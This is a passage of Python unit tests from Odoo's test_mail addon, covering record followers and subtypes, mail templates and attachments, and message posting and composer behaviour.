from odoo.addons.test_mail.tests.common import mail_new_test_user
from odoo.tools.misc import mute_logger
class BaseFollowersTest(common.BaseFunctionalTest):
@classmethod
def setUpClass(cls):
super(BaseFollowersTest, cls).setUpClass()
Subtype = cls.env['mail.message.subtype']
cls.mt_mg_def = Subtype.create({'name': 'mt_mg_def', 'default': True, 'res_model': 'mail.test.simple'})
cls.mt_cl_def = Subtype.create({'name': 'mt_cl_def', 'default': True, 'res_model': 'mail.test'})
cls.mt_al_def = Subtype.create({'name': 'mt_al_def', 'default': True, 'res_model': False})
cls.mt_mg_nodef = Subtype.create({'name': 'mt_mg_nodef', 'default': False, 'res_model': 'mail.test.simple'})
cls.mt_al_nodef = Subtype.create({'name': 'mt_al_nodef', 'default': False, 'res_model': False})
cls.mt_mg_def_int = cls.env['mail.message.subtype'].create({'name': 'mt_mg_def', 'default': True, 'res_model': 'mail.test.simple', 'internal': True})
cls.default_group_subtypes = Subtype.search([('default', '=', True), '|', ('res_model', '=', 'mail.test.simple'), ('res_model', '=', False)])
cls.default_group_subtypes_portal = Subtype.search([('internal', '=', False), ('default', '=', True), '|', ('res_model', '=', 'mail.test.simple'), ('res_model', '=', False)])
def test_field_message_is_follower(self):
test_record = self.test_record.sudo(self.user_employee)
followed_before = test_record.search([('message_is_follower', '=', True)])
self.assertFalse(test_record.message_is_follower)
test_record.message_subscribe(partner_ids=[self.user_employee.partner_id.id])
followed_after = test_record.search([('message_is_follower', '=', True)])
self.assertTrue(test_record.message_is_follower)
self.assertEqual(followed_before | test_record, followed_after)
def test_field_followers(self):
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[self.user_employee.partner_id.id, self.user_admin.partner_id.id], channel_ids=[self.channel_listen.id])
followers = self.env['mail.followers'].search([
('res_model', '=', 'mail.test.simple'),
('res_id', '=', test_record.id)])
self.assertEqual(followers, test_record.message_follower_ids)
self.assertEqual(test_record.message_partner_ids, self.user_employee.partner_id | self.user_admin.partner_id)
self.assertEqual(test_record.message_channel_ids, self.channel_listen)
def test_followers_subtypes_default(self):
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[self.user_employee.partner_id.id])
self.assertEqual(test_record.message_partner_ids, self.user_employee.partner_id)
follower = self.env['mail.followers'].search([
('res_model', '=', 'mail.test.simple'),
('res_id', '=', test_record.id),
('partner_id', '=', self.user_employee.partner_id.id)])
self.assertEqual(follower, test_record.message_follower_ids)
self.assertEqual(follower.subtype_ids, self.default_group_subtypes)
def test_followers_subtypes_default_internal(self):
user_portal = mail_new_test_user(self.env, login='chell', groups='base.group_portal', name='<NAME>')
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[user_portal.partner_id.id])
self.assertEqual(test_record.message_partner_ids, user_portal.partner_id)
follower = self.env['mail.followers'].search([
('res_model', '=', 'mail.test.simple'),
('res_id', '=', test_record.id),
('partner_id', '=', user_portal.partner_id.id)])
self.assertEqual(follower.subtype_ids, self.default_group_subtypes_portal)
def test_followers_subtypes_specified(self):
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[self.user_employee.partner_id.id], subtype_ids=[self.mt_mg_nodef.id])
self.assertEqual(test_record.message_partner_ids, self.user_employee.partner_id)
follower = self.env['mail.followers'].search([
('res_model', '=', 'mail.test.simple'),
('res_id', '=', test_record.id),
('partner_id', '=', self.user_employee.partner_id.id)])
self.assertEqual(follower, test_record.message_follower_ids)
self.assertEqual(follower.subtype_ids, self.mt_mg_nodef)
def test_followers_multiple_subscription_force(self):
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id], subtype_ids=[self.mt_mg_nodef.id])
self.assertEqual(test_record.message_partner_ids, self.user_admin.partner_id)
self.assertEqual(test_record.message_channel_ids, self.env['mail.channel'])
self.assertEqual(test_record.message_follower_ids.subtype_ids, self.mt_mg_nodef)
test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id], subtype_ids=[self.mt_mg_nodef.id, self.mt_al_nodef.id])
self.assertEqual(test_record.message_partner_ids, self.user_admin.partner_id)
self.assertEqual(test_record.message_channel_ids, self.env['mail.channel'])
self.assertEqual(test_record.message_follower_ids.subtype_ids, self.mt_mg_nodef | self.mt_al_nodef)
def test_followers_multiple_subscription_noforce(self):
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id], subtype_ids=[self.mt_mg_nodef.id, self.mt_al_nodef.id])
self.assertEqual(test_record.message_partner_ids, self.user_admin.partner_id)
self.assertEqual(test_record.message_channel_ids, self.env['mail.channel'])
self.assertEqual(test_record.message_follower_ids.subtype_ids, self.mt_mg_nodef | self.mt_al_nodef)
# set new subtypes with force=False, meaning no rewriting of the subscription is done -> result should not change
test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id])
self.assertEqual(test_record.message_partner_ids, self.user_admin.partner_id)
self.assertEqual(test_record.message_channel_ids, self.env['mail.channel'])
self.assertEqual(test_record.message_follower_ids.subtype_ids, self.mt_mg_nodef | self.mt_al_nodef)
def test_followers_no_DID(self):
"""Test that a follower cannot suffer from dissociative identity disorder.
It cannot be both a partner and a channel.
"""
with self.assertRaises(IntegrityError), mute_logger('odoo.sql_db'):
self.env['mail.followers'].create({
'res_model': self.test_record._name,
'res_id': self.test_record.id,
'partner_id': self.user_employee.partner_id.id,
'channel_id': self.channel_listen.id,
})
class AdvancedFollowersTest(common.BaseFunctionalTest):
@classmethod
def setUpClass(cls):
super(AdvancedFollowersTest, cls).setUpClass()
cls.user_portal = mail_new_test_user(cls.env, login='chell', groups='base.group_portal', name='<NAME>')
cls.test_track = cls.env['mail.test.track'].sudo(cls.user_employee).create({
'name': 'Test',
})
Subtype = cls.env['mail.message.subtype']
# clean demo data to avoid interferences
Subtype.search([('res_model', 'in', ['mail.test', 'mail.test.track'])]).unlink()
cls.sub_nodef = Subtype.create({'name': 'Sub NoDefault', 'default': False, 'res_model': 'mail.test'})
cls.sub_umb1 = Subtype.create({'name': 'Sub Umbrella1', 'default': False, 'res_model': 'mail.test.track'})
cls.sub_umb2 = Subtype.create({'name': 'Sub Umbrella2', 'default': False, 'res_model': 'mail.test.track'})
cls.umb_def = Subtype.create({'name': 'Umbrella Default', 'default': True, 'res_model': 'mail.test'})
# create subtypes for auto subscription from umbrella to sub records
cls.umb_sub_def = Subtype.create({
'name': 'Umbrella Sub1', 'default': True, 'res_model': 'mail.test',
'parent_id': cls.sub_umb1.id, 'relation_field': 'umbrella_id'})
cls.umb_sub_nodef = Subtype.create({
'name': 'Umbrella Sub2', 'default': False, 'res_model': 'mail.test',
'parent_id': cls.sub_umb2.id, 'relation_field': 'umbrella_id'})
def test_auto_subscribe_create(self):
""" Creator of records are automatically added as followers """
self.assertEqual(self.test_track.message_partner_ids, self.user_employee.partner_id)
def test_auto_subscribe_post(self):
""" People posting a message are automatically added as followers """
self.test_track.sudo(self.user_admin).message_post(body='Coucou hibou', message_type='comment')
self.assertEqual(self.test_track.message_partner_ids, self.user_employee.partner_id | self.user_admin.partner_id)
def test_auto_subscribe_post_email(self):
""" People posting an email are automatically added as followers """
self.test_track.sudo(self.user_admin).message_post(body='Coucou hibou', message_type='email')
self.assertEqual(self.test_track.message_partner_ids, self.user_employee.partner_id | self.user_admin.partner_id)
def test_auto_subscribe_not_on_notification(self):
""" People posting an automatic notification are not subscribed """
self.test_track.sudo(self.user_admin).message_post(body='Coucou hibou', message_type='notification')
self.assertEqual(self.test_track.message_partner_ids, self.user_employee.partner_id)
def test_auto_subscribe_responsible(self):
""" Responsibles are tracked and added as followers """
sub = self.env['mail.test.track'].sudo(self.user_employee).create({
'name': 'Test',
'user_id': self.user_admin.id,
})
self.assertEqual(sub.message_partner_ids, (self.user_employee.partner_id | self.user_admin.partner_id))
def test_auto_subscribe_defaults(self):
""" Test auto subscription based on an umbrella record. This mimics
the behavior of addons like project and task where subscribing to
some project's subtypes automatically subscribes the follower to its tasks.
Functional rules applied here:
* subscribing to an umbrella subtype with parent_id / relation_field set
automatically creates a subscription with matching subtypes
* subscribing to a sub-record as creator applies default subtype values
* portal user should not have access to internal subtypes
"""
umbrella = self.env['mail.test'].with_context(common.BaseFunctionalTest._test_context).create({
'name': 'Project-Like',
})
umbrella.message_subscribe(partner_ids=[self.user_portal.partner_id.id])
self.assertEqual(umbrella.message_partner_ids, self.user_portal.partner_id)
sub1 = self.env['mail.test.track'].sudo(self.user_employee).create({
'name': 'Task-Like Test',
'umbrella_id': umbrella.id,
})
all_defaults = self.env['mail.message.subtype'].search([('default', '=', True), '|', ('res_model', '=', 'mail.test.track'), ('res_model', '=', False)])
external_defaults = all_defaults.filtered(lambda subtype: not subtype.internal)
self.assertEqual(sub1.message_partner_ids, self.user_portal.partner_id | self.user_employee.partner_id)
self.assertEqual(
sub1.message_follower_ids.filtered(lambda fol: fol.partner_id == self.user_portal.partner_id).subtype_ids,
external_defaults | self.sub_umb1)
self.assertEqual(
sub1.message_follower_ids.filtered(lambda fol: fol.partner_id == self.user_employee.partner_id).subtype_ids,
all_defaults)
```
#### File: test_mail/tests/test_mail_template.py
```python
import base64
from datetime import datetime, timedelta
from unittest.mock import patch
from odoo.addons.test_mail.tests.common import BaseFunctionalTest, MockEmails, TestRecipients
from odoo.addons.test_mail.tests.common import mail_new_test_user
from odoo.tools import mute_logger, DEFAULT_SERVER_DATETIME_FORMAT
class TestMailTemplate(BaseFunctionalTest, MockEmails, TestRecipients):
def setUp(self):
super(TestMailTemplate, self).setUp()
self.user_employee.write({
'groups_id': [(4, self.env.ref('base.group_partner_manager').id)],
})
self._attachments = [{
'name': '_Test_First',
'datas_fname': 'first.txt',
'datas': base64.b64encode(b'My first attachment'),
'res_model': 'res.partner',
'res_id': self.user_admin.partner_id.id
}, {
'name': '_Test_Second',
'datas_fname': 'second.txt',
'datas': base64.b64encode(b'My second attachment'),
'res_model': 'res.partner',
'res_id': self.user_admin.partner_id.id
}]
self.email_1 = '<EMAIL>'
self.email_2 = '<EMAIL>'
self.email_3 = self.partner_1.email
self.email_template = self.env['mail.template'].create({
'model_id': self.env['ir.model']._get('mail.test.simple').id,
'name': 'Pigs Template',
'subject': '${object.name}',
'body_html': '${object.email_from}',
'user_signature': False,
'attachment_ids': [(0, 0, self._attachments[0]), (0, 0, self._attachments[1])],
'partner_to': '%s,%s' % (self.partner_2.id, self.user_admin.partner_id.id),
'email_to': '%s, %s' % (self.email_1, self.email_2),
'email_cc': '%s' % self.email_3})
# admin should receive emails
self.user_admin.write({'notification_type': 'email'})
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_w_template(self):
composer = self.env['mail.compose.message'].sudo(self.user_employee).with_context({
'default_composition_mode': 'comment',
'default_model': 'mail.test.simple',
'default_res_id': self.test_record.id,
'default_template_id': self.email_template.id,
}).create({'subject': 'Forget me subject', 'body': 'Dummy body'})
# perform onchange and send emails
values = composer.onchange_template_id(self.email_template.id, 'comment', self.test_record._name, self.test_record.id)['value']
composer.write(values)
composer.send_mail()
new_partners = self.env['res.partner'].search([('email', 'in', [self.email_1, self.email_2])])
self.assertEmails(
self.user_employee.partner_id,
[[self.partner_1], [self.partner_2], [new_partners[0]], [new_partners[1]], [self.partner_admin]],
subject=self.test_record.name,
body_content=self.test_record.email_from,
attachments=[('first.txt', b'My first attachment', 'text/plain'), ('second.txt', b'My second attachment', 'text/plain')])
def test_composer_template_onchange_attachments(self):
"""Tests that all attachments are added to the composer,
static attachments are not duplicated while reports are re-generated,
and that intermediary attachments are dropped."""
composer = self.env['mail.compose.message'].with_context(default_attachment_ids=[]).create({})
report_template = self.env.ref('web.action_report_externalpreview')
template_1 = self.email_template.copy({
'report_template': report_template.id,
})
template_2 = self.email_template.copy({
'attachment_ids': False,
'report_template': report_template.id,
})
onchange_templates = [template_1, template_2, template_1, False]
attachments_onchange = [composer.attachment_ids]
# template_1 has two static attachments and one dynamically generated report,
# template_2 only has the report, so we should get 3, 1, 3 attachments
attachment_numbers = [0, 3, 1, 3, 0]
with self.env.do_in_onchange():
for template in onchange_templates:
onchange = composer.onchange_template_id(
template.id if template else False, 'comment', self.test_record._name, self.test_record.id
)
values = composer._convert_to_record(composer._convert_to_cache(onchange['value']))
attachments_onchange.append(values['attachment_ids'])
composer.update(onchange['value'])
self.assertEqual(
[len(attachments) for attachments in attachments_onchange],
attachment_numbers,
)
self.assertTrue(
len(attachments_onchange[1] & attachments_onchange[3]) == 2,
"The two static attachments on the template should be common to the two onchanges"
)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_post_w_template(self):
self.test_record.sudo(self.user_employee).message_post_with_template(self.email_template.id, composition_mode='comment')
new_partners = self.env['res.partner'].search([('email', 'in', [self.email_1, self.email_2])])
self.assertEmails(
self.user_employee.partner_id,
[[self.partner_1], [self.partner_2], [new_partners[0]], [new_partners[1]], [self.partner_admin]],
subject=self.test_record.name,
body_content=self.test_record.email_from,
attachments=[('first.txt', b'My first attachment', 'text/plain'), ('second.txt', b'My second attachment', 'text/plain')])
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_w_template_mass_mailing(self):
test_record_2 = self.env['mail.test.simple'].with_context(BaseFunctionalTest._test_context).create({'name': 'Test2', 'email_from': '<EMAIL>'})
composer = self.env['mail.compose.message'].sudo(self.user_employee).with_context({
'default_composition_mode': 'mass_mail',
# 'default_notify': True,
'default_notify': False,
'default_model': 'mail.test.simple',
'default_res_id': self.test_record.id,
'default_template_id': self.email_template.id,
'active_ids': [self.test_record.id, test_record_2.id]
}).create({})
values = composer.onchange_template_id(self.email_template.id, 'mass_mail', 'mail.test.simple', self.test_record.id)['value']
composer.write(values)
composer.send_mail()
new_partners = self.env['res.partner'].search([('email', 'in', [self.email_1, self.email_2])])
# hack to use assertEmails
self._mails_record1 = [dict(mail) for mail in self._mails if '%s-%s' % (self.test_record.id, self.test_record._name) in mail['message_id']]
self._mails_record2 = [dict(mail) for mail in self._mails if '%s-%s' % (test_record_2.id, test_record_2._name) in mail['message_id']]
self._mails = self._mails_record1
self.assertEmails(
self.user_employee.partner_id,
[[self.partner_1], [self.partner_2], [new_partners[0]], [new_partners[1]], [self.partner_admin]],
subject=self.test_record.name,
body_content=self.test_record.email_from,
attachments=[('first.txt', b'My first attachment', 'text/plain'), ('second.txt', b'My second attachment', 'text/plain')])
self._mails = self._mails_record2
self.assertEmails(
self.user_employee.partner_id,
[[self.partner_1], [self.partner_2], [new_partners[0]], [new_partners[1]], [self.partner_admin]],
subject=test_record_2.name,
body_content=test_record_2.email_from,
attachments=[('first.txt', b'My first attachment', 'text/plain'), ('second.txt', b'My second attachment', 'text/plain')])
message_1 = self.test_record.message_ids[0]
message_2 = test_record_2.message_ids[0]
# messages effectively posted
self.assertEqual(message_1.subject, self.test_record.name)
self.assertEqual(message_2.subject, test_record_2.name)
self.assertIn(self.test_record.email_from, message_1.body)
self.assertIn(test_record_2.email_from, message_2.body)
def test_composer_template_save(self):
self.env['mail.compose.message'].with_context({
'default_composition_mode': 'comment',
'default_model': 'mail.test.simple',
'default_res_id': self.test_record.id,
}).create({
'subject': 'Forget me subject',
'body': '<p>Dummy body</p>'
}).save_as_template()
# Test: email_template subject, body_html, model
last_template = self.env['mail.template'].search([('model', '=', 'mail.test.simple'), ('subject', '=', 'Forget me subject')], limit=1)
self.assertEqual(last_template.body_html, '<p>Dummy body</p>', 'email_template incorrect body_html')
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_template_send_email(self):
mail_id = self.email_template.send_mail(self.test_record.id)
mail = self.env['mail.mail'].browse(mail_id)
self.assertEqual(mail.subject, self.test_record.name)
self.assertEqual(mail.email_to, self.email_template.email_to)
self.assertEqual(mail.email_cc, self.email_template.email_cc)
self.assertEqual(mail.recipient_ids, self.partner_2 | self.user_admin.partner_id)
def test_template_add_context_action(self):
self.email_template.create_action()
# check template act_window has been updated
self.assertTrue(bool(self.email_template.ref_ir_act_window))
# check those records
action = self.email_template.ref_ir_act_window
self.assertEqual(action.name, 'Send Mail (%s)' % self.email_template.name)
self.assertEqual(action.binding_model_id.model, 'mail.test.simple')
# def test_template_scheduled_date(self):
# from unittest.mock import patch
# self.email_template_in_2_days = self.email_template.copy()
# with patch('odoo.addons.mail.tests.test_mail_template.datetime', wraps=datetime) as mock_datetime:
# mock_datetime.now.return_value = datetime(2017, 11, 15, 11, 30, 28)
# mock_datetime.side_effect = lambda *args, **kw: datetime(*args, **kw)
# self.email_template_in_2_days.write({
# 'scheduled_date': "${(datetime.datetime.now() + relativedelta(days=2)).strftime('%s')}" % DEFAULT_SERVER_DATETIME_FORMAT,
# })
# mail_now_id = self.email_template.send_mail(self.test_record.id)
# mail_in_2_days_id = self.email_template_in_2_days.send_mail(self.test_record.id)
# mail_now = self.env['mail.mail'].browse(mail_now_id)
# mail_in_2_days = self.env['mail.mail'].browse(mail_in_2_days_id)
# # mail preparation
# self.assertEqual(mail_now.exists() | mail_in_2_days.exists(), mail_now | mail_in_2_days)
# self.assertEqual(bool(mail_now.scheduled_date), False)
# self.assertEqual(mail_now.state, 'outgoing')
# self.assertEqual(mail_in_2_days.state, 'outgoing')
# scheduled_date = datetime.strptime(mail_in_2_days.scheduled_date, DEFAULT_SERVER_DATETIME_FORMAT)
# date_in_2_days = datetime.now() + timedelta(days = 2)
# self.assertEqual(scheduled_date, date_in_2_days)
# # self.assertEqual(scheduled_date.month, date_in_2_days.month)
# # self.assertEqual(scheduled_date.year, date_in_2_days.year)
# # Launch the scheduler on the first mail, it should be reported in self.mails
# # and the mail_mail is now deleted
# self.env['mail.mail'].process_email_queue()
# self.assertEqual(mail_now.exists() | mail_in_2_days.exists(), mail_in_2_days)
# # Launch the scheduler on the first mail, it's still in 'outgoing' state
# self.env['mail.mail'].process_email_queue(ids=[mail_in_2_days.id])
# self.assertEqual(mail_in_2_days.state, 'outgoing')
# self.assertEqual(mail_now.exists() | mail_in_2_days.exists(), mail_in_2_days)
def test_create_partner_from_tracking_multicompany(self):
company1 = self.env['res.company'].create({'name': 'company1'})
self.env.user.write({'company_ids': [(4, company1.id, False)]})
self.assertNotEqual(self.env.user.company_id, company1)
email_new_partner = "<EMAIL>"
Partner = self.env['res.partner']
self.assertFalse(Partner.search([('email', '=', email_new_partner)]))
template = self.env['mail.template'].create({
'model_id': self.env['ir.model']._get('mail.test.track').id,
'name': 'AutoTemplate',
'subject': 'autoresponse',
'email_from': self.env.user.email_formatted,
'email_to': "${object.email_from}",
'body_html': "<div>A nice body</div>",
})
def patched_message_track_post_template(*args, **kwargs):
args[0].message_post_with_template(template.id)
return True
with patch('odoo.addons.mail.models.mail_thread.MailThread._message_track_post_template', patched_message_track_post_template):
self.env['mail.test.track'].create({
'email_from': email_new_partner,
'company_id': company1.id,
'user_id': self.env.user.id, # trigger tracking,
})
new_partner = Partner.search([('email', '=', email_new_partner)])
self.assertTrue(new_partner)
self.assertEqual(new_partner.company_id, company1)
def test_composer_template_onchange_attachments(self):
"""Tests that all attachments are added to the composer,
static attachments are not duplicated and while reports are re-generated,
and that intermediary attachments are dropped."""
composer = self.env['mail.compose.message'].with_context(default_attachment_ids=[]).create({})
report_template = self.env.ref('web.action_report_externalpreview')
template_1 = self.email_template.copy({
'report_template': report_template.id,
})
template_2 = self.email_template.copy({
'attachment_ids': False,
'report_template': report_template.id,
})
onchange_templates = [template_1, template_2, template_1, False]
attachments_onchange = [composer.attachment_ids]
# template_1 has two static attachments and one dynamically generated report,
# template_2 only has the report, so we should get 3, 1, 3 attachments
# and when there is no template, no attachments
attachment_numbers = [0, 3, 1, 3, 0]
with self.env.do_in_onchange():
for template in onchange_templates:
onchange = composer.onchange_template_id(
template.id if template else False, 'comment', 'mail.test.simple', self.test_record.id
)
values = composer._convert_to_record(composer._convert_to_cache(onchange['value']))
attachments_onchange.append(values['attachment_ids'])
composer.update(onchange['value'])
self.assertEqual(
[len(attachments) for attachments in attachments_onchange],
attachment_numbers,
)
self.assertTrue(
len(attachments_onchange[1] & attachments_onchange[3]) == 2,
"The two static attachments on the template should be common to the two onchanges"
)
```
#### File: test_mail/tests/test_message_compose.py
```python
import base64
from email.utils import formataddr
from unittest.mock import patch
from odoo.addons.test_mail.tests.common import BaseFunctionalTest, MockEmails, TestRecipients
from odoo.addons.test_mail.tests.common import mail_new_test_user
from odoo.addons.test_mail.data.test_mail_data import MAIL_TEMPLATE_PLAINTEXT
from odoo.addons.test_mail.models.test_mail_models import MailTestSimple
from odoo.exceptions import AccessError
from odoo.tools import mute_logger
class TestMessagePost(BaseFunctionalTest, MockEmails, TestRecipients):
def setUp(self):
super(TestMessagePost, self).setUp()
# configure mailing
self.alias_domain = 'schlouby.fr'
self.alias_catchall = 'test+catchall'
self.env['ir.config_parameter'].set_param('mail.catchall.domain', self.alias_domain)
self.env['ir.config_parameter'].set_param('mail.catchall.alias', self.alias_catchall)
# admin should not receive emails
self.user_admin.write({'notification_type': 'email'})
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_notifications(self):
_body, _body_alt, _subject = '<p>Test Body</p>', 'Test Body', 'Test Subject'
# subscribe second employee to the group to test notifications
self.test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id])
msg = self.test_record.sudo(self.user_employee).message_post(
body=_body, subject=_subject,
message_type='comment', subtype='mt_comment',
partner_ids=[self.partner_1.id, self.partner_2.id]
)
# message content
self.assertEqual(msg.subject, _subject)
self.assertEqual(msg.body, _body)
self.assertEqual(msg.partner_ids, self.partner_1 | self.partner_2)
self.assertEqual(msg.needaction_partner_ids, self.user_admin.partner_id | self.partner_1 | self.partner_2)
self.assertEqual(msg.channel_ids, self.env['mail.channel'])
# notifications emails should have been deleted
self.assertFalse(self.env['mail.mail'].search([('mail_message_id', '=', msg.id)]),
'message_post: mail.mail notifications should have been auto-deleted')
# notification emails
self.assertEmails(
self.user_employee.partner_id,
[[self.partner_1], [self.partner_2], [self.user_admin.partner_id]],
reply_to=msg.reply_to, subject=_subject,
body_content=_body, body_alt_content=_body_alt,
references=False)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_notifications_keep_emails(self):
self.test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id])
msg = self.test_record.sudo(self.user_employee).message_post(
body='Test', subject='Test',
message_type='comment', subtype='mt_comment',
partner_ids=[self.partner_1.id, self.partner_2.id],
mail_auto_delete=False
)
# notifications emails should not have been deleted: one for customers, one for user
self.assertEqual(len(self.env['mail.mail'].search([('mail_message_id', '=', msg.id)])), 2)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_notifications_emails_tweak(self):
pass
# we should check _notification_groups behavior, for emails and buttons
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_attachments(self):
_attachments = [
('List1', b'My first attachment'),
('List2', b'My second attachment')
]
_attach_1 = self.env['ir.attachment'].sudo(self.user_employee).create({
'name': 'Attach1', 'datas_fname': 'Attach1',
'datas': 'bWlncmF0aW9uIHRlc3Q=',
'res_model': 'mail.compose.message', 'res_id': 0})
_attach_2 = self.env['ir.attachment'].sudo(self.user_employee).create({
'name': 'Attach2', 'datas_fname': 'Attach2',
'datas': 'bWlncmF0aW9uIHRlc3Q=',
'res_model': 'mail.compose.message', 'res_id': 0})
msg = self.test_record.sudo(self.user_employee).message_post(
body='Test', subject='Test',
message_type='comment', subtype='mt_comment',
attachment_ids=[_attach_1.id, _attach_2.id],
partner_ids=[self.partner_1.id],
attachments=_attachments,
)
# message attachments
self.assertEqual(len(msg.attachment_ids), 4)
self.assertEqual(set(msg.attachment_ids.mapped('res_model')), set([self.test_record._name]))
self.assertEqual(set(msg.attachment_ids.mapped('res_id')), set([self.test_record.id]))
self.assertEqual(set([base64.b64decode(x) for x in msg.attachment_ids.mapped('datas')]),
set([b'migration test', _attachments[0][1], _attachments[1][1]]))
self.assertTrue(set([_attach_1.id, _attach_2.id]).issubset(msg.attachment_ids.ids),
'message_post: mail.message attachments duplicated')
# notification email attachments
self.assertEmails(self.user_employee.partner_id, [[self.partner_1]])
# self.assertEqual(len(self._mails), 1)
self.assertEqual(len(self._mails[0]['attachments']), 4)
self.assertIn(('List1', b'My first attachment', 'application/octet-stream'), self._mails[0]['attachments'])
self.assertIn(('List2', b'My second attachment', 'application/octet-stream'), self._mails[0]['attachments'])
self.assertIn(('Attach1', b'migration test', 'application/octet-stream'), self._mails[0]['attachments'])
self.assertIn(('Attach2', b'migration test', 'application/octet-stream'), self._mails[0]['attachments'])
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_answer(self):
parent_msg = self.test_record.sudo(self.user_employee).message_post(
body='<p>Test</p>', subject='Test Subject',
message_type='comment', subtype='mt_comment')
self.assertEqual(parent_msg.partner_ids, self.env['res.partner'])
self.assertEmails(self.user_employee.partner_id, [])
msg = self.test_record.sudo(self.user_employee).message_post(
body='<p>Test Answer</p>',
message_type='comment', subtype='mt_comment',
partner_ids=[self.partner_1.id],
parent_id=parent_msg.id)
self.assertEqual(msg.parent_id.id, parent_msg.id)
self.assertEqual(msg.partner_ids, self.partner_1)
self.assertEqual(parent_msg.partner_ids, self.env['res.partner'])
# check notification emails: references
self.assertEmails(self.user_employee.partner_id, [[self.partner_1]], ref_content='openerp-%d-mail.test.simple' % self.test_record.id)
# self.assertTrue(all('openerp-%d-mail.test.simple' % self.test_record.id in m['references'] for m in self._mails))
new_msg = self.test_record.sudo(self.user_employee).message_post(
body='<p>Test Answer Bis</p>',
message_type='comment', subtype='mt_comment',
parent_id=msg.id)
self.assertEqual(new_msg.parent_id.id, parent_msg.id, 'message_post: flatten error')
self.assertEqual(new_msg.partner_ids, self.env['res.partner'])
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_portal_ok(self):
portal_user = mail_new_test_user(self.env, login='chell', groups='base.group_portal', name='<NAME>')
with patch.object(MailTestSimple, 'check_access_rights', return_value=True):
self.test_record.message_subscribe((self.partner_1 | self.user_employee.partner_id).ids)
new_msg = self.test_record.sudo(portal_user).message_post(
body='<p>Test</p>', subject='Subject',
message_type='comment', subtype='mt_comment')
self.assertEqual(new_msg.sudo().needaction_partner_ids, (self.partner_1 | self.user_employee.partner_id))
self.assertEmails(portal_user.partner_id, [[self.partner_1], [self.user_employee.partner_id]])
def test_post_portal_crash(self):
portal_user = mail_new_test_user(self.env, login='chell', groups='base.group_portal', name='<NAME>')
with self.assertRaises(AccessError):
self.test_record.sudo(portal_user).message_post(
body='<p>Test</p>', subject='Subject',
message_type='comment', subtype='mt_comment')
@mute_logger('odoo.addons.mail.models.mail_mail', 'odoo.addons.mail.models.mail_thread')
def test_post_internal(self):
self.test_record.message_subscribe([self.user_admin.partner_id.id])
msg = self.test_record.sudo(self.user_employee).message_post(
body='My Body', subject='My Subject',
message_type='comment', subtype='mt_note')
self.assertEqual(msg.partner_ids, self.env['res.partner'])
self.assertEqual(msg.needaction_partner_ids, self.env['res.partner'])
self.format_and_process(
MAIL_TEMPLATE_PLAINTEXT,
email_from=self.user_admin.email,
msg_id='<1198923581.41972151344608186800.<EMAIL>>',
to='<EMAIL>',
extra='In-Reply-To:\r\n\t%s\n' % msg.message_id)
reply = self.test_record.message_ids - msg
self.assertTrue(reply)
self.assertEqual(reply.subtype_id, self.env.ref('mail.mt_note'))
self.assertEqual(reply.needaction_partner_ids, self.user_employee.partner_id)
self.assertEqual(reply.parent_id, msg)
def test_post_log(self):
new_note = self.test_record.sudo(self.user_employee)._message_log(
body='<p>Labrador</p>',
)
self.assertEqual(new_note.subtype_id, self.env.ref('mail.mt_note'))
self.assertEqual(new_note.body, '<p>Labrador</p>')
self.assertEqual(new_note.author_id, self.user_employee.partner_id)
self.assertEqual(new_note.email_from, formataddr((self.user_employee.name, self.user_employee.email)))
self.assertEqual(new_note.needaction_partner_ids, self.env['res.partner'])
def test_post_notify(self):
self.user_employee.write({'notification_type': 'inbox'})
new_notification = self.env['mail.thread'].message_notify(
subject='This should be a subject',
body='<p>You have received a notification</p>',
partner_ids=[(4, self.partner_1.id), (4, self.user_employee.partner_id.id)],
)
self.assertEqual(new_notification.subtype_id, self.env.ref('mail.mt_note'))
self.assertEqual(new_notification.body, '<p>You have received a notification</p>')
self.assertEqual(new_notification.author_id, self.env.user.partner_id)
self.assertEqual(new_notification.email_from, formataddr((self.env.user.name, self.env.user.email)))
self.assertEqual(new_notification.needaction_partner_ids, self.partner_1 | self.user_employee.partner_id)
class TestComposer(BaseFunctionalTest, MockEmails, TestRecipients):
def setUp(self):
super(TestComposer, self).setUp()
# configure mailing
self.alias_domain = 'schlouby.fr'
self.alias_catchall = 'test+catchall'
self.env['ir.config_parameter'].set_param('mail.catchall.domain', self.alias_domain)
self.env['ir.config_parameter'].set_param('mail.catchall.alias', self.alias_catchall)
# admin should not receive emails
self.user_admin.write({'notification_type': 'email'})
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_comment(self):
composer = self.env['mail.compose.message'].with_context({
'default_composition_mode': 'comment',
'default_model': self.test_record._name,
'default_res_id': self.test_record.id,
}).sudo(self.user_employee).create({
'body': '<p>Test Body</p>',
'partner_ids': [(4, self.partner_1.id), (4, self.partner_2.id)]
})
composer.send_mail()
message = self.test_record.message_ids[0]
self.assertEqual(message.body, '<p>Test Body</p>')
self.assertEqual(message.author_id, self.user_employee.partner_id)
self.assertEqual(message.subject, 'Re: %s' % self.test_record.name)
self.assertEqual(message.subtype_id, self.env.ref('mail.mt_comment'))
self.assertEqual(message.partner_ids, self.partner_1 | self.partner_2)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_comment_parent(self):
parent = self.test_record.message_post(body='Test')
self.env['mail.compose.message'].with_context({
'default_composition_mode': 'comment',
'default_parent_id': parent.id
}).sudo(self.user_employee).create({
